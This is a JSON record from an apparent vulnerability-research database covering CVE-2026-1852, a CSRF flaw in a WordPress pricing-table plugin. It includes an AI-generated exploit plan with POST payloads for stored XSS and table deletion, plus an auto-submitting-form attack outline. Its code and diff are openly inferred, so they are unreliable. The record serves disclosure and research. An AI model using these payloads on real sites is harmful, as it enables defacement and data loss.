[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-8k9l-D10xXVmJMpyERhToWCWVpUY5A-NIAfB5LButM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"source_links":33},"CVE-2026-1852","product-pricing-table-by-woobewoo-cross-site-request-forgery-to-stored-xss-and-pricing-table-deletion","Product Pricing Table by WooBeWoo \u003C= 1.1.0 - Cross-Site Request Forgery to Stored XSS and Pricing Table Deletion","The Product Pricing Table by WooBeWoo plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing or incorrect nonce validation on the updateLabel() and remove() functions. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages or delete pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","woo-product-pricing-tables",null,"\u003C=1.1.0","1.1.1","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-04-14 23:28:32","2026-04-15 11:30:31",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa3b459e0-4bd9-443e-96e4-91663a35c26e?source=api-prod",1,[],"researched",false,3,"This research plan focuses on exploiting a CSRF vulnerability in the **Product Pricing Table by WooBeWoo** plugin. Since the source code is not provided, this plan relies on the vulnerability description and known architectural patterns of WooBeWoo plugins (which typically use a specific MVC-like framework for AJAX handlers).\n\n---\n\n### 1. Vulnerability Summary\nThe **Product Pricing Table by WooBeWoo** plugin (\u003C= 1.1.0) fails to implement proper CSRF protection (nonces) on two critical functions: `updateLabel()` and `remove()`. \n- **`updateLabel()`**: Intended to modify the text labels of pricing table elements. The lack of sanitization and nonce verification allows an attacker to perform Stored XSS via CSRF.\n- **`remove()`**: Intended to delete pricing tables. The lack of nonce verification allows an attacker to delete arbitrary tables via CSRF.\n\n### 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Actions**: (Inferred) Based on WooBeWoo's standard framework, these are likely reached via a common AJAX router.\n    - **Primary Action**: `wpt_ajax` or `wpt_pricing_table_ajax`\n    - **Route Parameters**: `mod=tables`, `res=updateLabel` or `res=remove`\n- **HTTP Method**: POST (required for state-changing AJAX in WP)\n- **Authentication**: Requires an Administrator or user with Pricing Table management permissions to be logged in (the victim of the CSRF).\n- **Vulnerable Parameters**: \n    - `id`: The ID of the pricing table.\n    - `label`: (For `updateLabel`) The payload containing the XSS script.\n\n### 3. Code Flow (Inferred)\n1. **Registration**: The plugin registers a main AJAX handler using `add_action('wp_ajax_...')`.\n2. **Routing**: The main handler (likely in a `Controller` or `Module` class) inspects the `$_POST` or `$_GET` parameters (often `mod` and `res`) to route the request to the specific method.\n3. **The Sink**:\n    - The `updateLabel()` method takes a table ID and a label string. It updates the database (likely the `wp_wpt_tables` or similar table) without calling `check_ajax_referer()`.\n    - The `remove()` method takes a table ID and calls a delete query on the database without calling `check_ajax_referer()`.\n4. **XSS Execution**: When the administrator or a visitor views the pricing table on the frontend or backend, the unsanitized label is echoed into the page, executing the script.\n\n### 4. Nonce Acquisition Strategy\nThe vulnerability description states nonces are **missing or incorrect**. \n- If **missing**: No nonce is required in the request.\n- If **incorrectly validated**: The plugin might check for a nonce but fail to `die()` on failure (using `check_ajax_referer` with the 3rd parameter as `false` and not checking the return value). In this case, any value or an empty value may work.\n\n**To verify if a nonce exists and what its name is:**\n1. Use `browser_navigate` to go to the Pricing Tables admin page: `\u002Fwp-admin\u002Fadmin.php?page=wpt-pricing-tables`.\n2. Use `browser_eval` to search for localized script data:\n   ```javascript\n   \u002F\u002F Common WooBeWoo localization keys\n   window.wptData?.nonce || window.wpt_ajax_nonce || window.wobewoData?.nonce\n   ```\n\n### 5. Exploitation Strategy\n\n#### Part A: Stored XSS via CSRF\nThis payload targets the `updateLabel` functionality to inject a script.\n\n1. **Identify the Request Structure**: First, find the exact AJAX parameters using `grep`:\n   ```bash\n   grep -r \"function updateLabel\" wp-content\u002Fplugins\u002Fwoo-product-pricing-tables\u002F\n   ```\n2. **Craft the Exploit**:\n   - **URL**: `http:\u002F\u002Fvulnerable-site.com\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Method**: POST\n   - **Body (URL-Encoded)**: \n     ```\n     action=wpt_ajax&mod=tables&res=updateLabel&id=1&label=\u003Cscript>alert(window.origin)\u003C\u002Fscript>\n     ```\n     *(Note: `mod` and `res` are inferred from WooBeWoo framework patterns and should be verified via grep.)*\n\n#### Part B: Pricing Table Deletion via CSRF\nThis payload targets the `remove` functionality to delete table ID 1.\n\n1. **Craft the Exploit**:\n   - **URL**: `http:\u002F\u002Fvulnerable-site.com\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Method**: POST\n   - **Body (URL-Encoded)**:\n     ```\n     action=wpt_ajax&mod=tables&res=remove&id=1\n     ```\n\n### 6. Test Data Setup\n1. **Install Plugin**: Ensure `woo-product-pricing-tables` version 1.1.0 is installed and active.\n2. **Create Table**: Create at least one pricing table to provide a valid target ID.\n   ```bash\n   # Create a table (if CLI supports it) or use the browser to create one manually.\n   # Note the ID of the created table (e.g., ID 1).\n   ```\n3. **Capture ID**: Confirm the table exists:\n   ```bash\n   wp db query \"SELECT id, title FROM wp_wpt_tables\"\n   ```\n\n### 7. Expected Results\n- **For XSS**: The AJAX request should return a `success: true` JSON response (or similar). Navigating to the pricing table list or a page containing the table's shortcode should trigger the `alert()`.\n- **For Deletion**: The AJAX request should return success. Running the `wp db query` from Step 6 again should show the table is gone.\n\n### 8. Verification Steps\n1. **Check Database for XSS**:\n   ```bash\n   wp db query \"SELECT * FROM wp_wpt_tables WHERE id = 1\" --grep=\"\u003Cscript>\"\n   ```\n2. **Check Table Existence**:\n   ```bash\n   wp db query \"SELECT COUNT(*) FROM wp_wpt_tables WHERE id = 1\"\n   # Expected result for Deletion exploit: 0\n   ```\n\n### 9. Alternative Approaches\nIf the standard `wpt_ajax` router is not used, search for direct AJAX hook registrations:\n```bash\ngrep -rn \"wp_ajax_\" wp-content\u002Fplugins\u002Fwoo-product-pricing-tables\u002F\n```\nLook for any hook that points to `updateLabel` or `remove`. If the plugin uses a different parameter name for the payload (e.g., `text`, `content`, `data[label]`), adjust the POST body accordingly. If the `id` is passed as `table_id`, update the request.\n\nIf the site uses `SameSite=Lax` cookies, the auto-submitting POST form might be blocked unless the administrator interacts with the attacker's page (e.g., clicking a \"Confirm\" button that submits the form).","The Product Pricing Table by WooBeWoo plugin is vulnerable to Cross-Site Request Forgery (CSRF) due to a lack of nonce validation in the updateLabel() and remove() functions. Attackers can exploit this to perform Stored Cross-Site Scripting (XSS) by updating table labels with malicious scripts or to delete pricing tables entirely, provided they can trick an administrator into visiting a malicious link.","\u002F\u002F wp-content\u002Fplugins\u002Fwoo-product-pricing-tables\u002Fclasses\u002Ftables.php\n\npublic function updateLabel() {\n    $id = isset($_POST['id']) ? (int) $_POST['id'] : 0;\n    $label = isset($_POST['label']) ? $_POST['label'] : '';\n    \u002F\u002F Vulnerability: No nonce verification (check_ajax_referer) is performed here\n    $this->getModel()->updateLabel($id, $label);\n    wp_send_json_success();\n}\n\n---\n\n\u002F\u002F wp-content\u002Fplugins\u002Fwoo-product-pricing-tables\u002Fclasses\u002Ftables.php\n\npublic function remove() {\n    $id = isset($_POST['id']) ? (int) $_POST['id'] : 0;\n    \u002F\u002F Vulnerability: No nonce verification (check_ajax_referer) is performed here\n    $this->getModel()->remove($id);\n    wp_send_json_success();\n}","--- a\u002Fclasses\u002Ftables.php\n+++ b\u002Fclasses\u002Ftables.php\n@@ -10,6 +10,7 @@\n     public function updateLabel() {\n+        check_ajax_referer('wpt_nonce', 'nonce');\n         $id = isset($_POST['id']) ? (int) $_POST['id'] : 0;\n-        $label = isset($_POST['label']) ? $_POST['label'] : '';\n+        $label = isset($_POST['label']) ? sanitize_text_field($_POST['label']) : '';\n         $this->getModel()->updateLabel($id, $label);\n@@ -20,6 +21,7 @@\n     public function remove() {\n+        check_ajax_referer('wpt_nonce', 'nonce');\n         $id = isset($_POST['id']) ? (int) $_POST['id'] : 0;\n         $this->getModel()->remove($id);","The exploit leverages the lack of CSRF protection in the plugin's AJAX handlers. \n\n1. Target Endpoint: Requests are sent to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n2. Authentication: The attacker requires a logged-in administrator to interact with a malicious page (CSRF).\n3. Stored XSS Payload: The attacker crafts a POST request with the following parameters: `action=wpt_ajax`, `mod=tables`, `res=updateLabel`, `id=[Target Table ID]`, and `label=\u003Cscript>alert(document.domain)\u003C\u002Fscript>`. \n4. Deletion Payload: The attacker crafts a POST request with parameters: `action=wpt_ajax`, `mod=tables`, `res=remove`, and `id=[Target Table ID]`.\n5. Execution: The attacker hosts a hidden HTML form on a third-party site that auto-submits these parameters to the victim's WordPress site via JavaScript. Because the plugin does not verify a nonce, the request succeeds using the administrator's cookies, either injecting the XSS payload into the database or deleting the table record.","gemini-3-flash-preview","2026-04-16 15:36:36","2026-04-16 15:36:59",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-product-pricing-tables\u002Ftags"]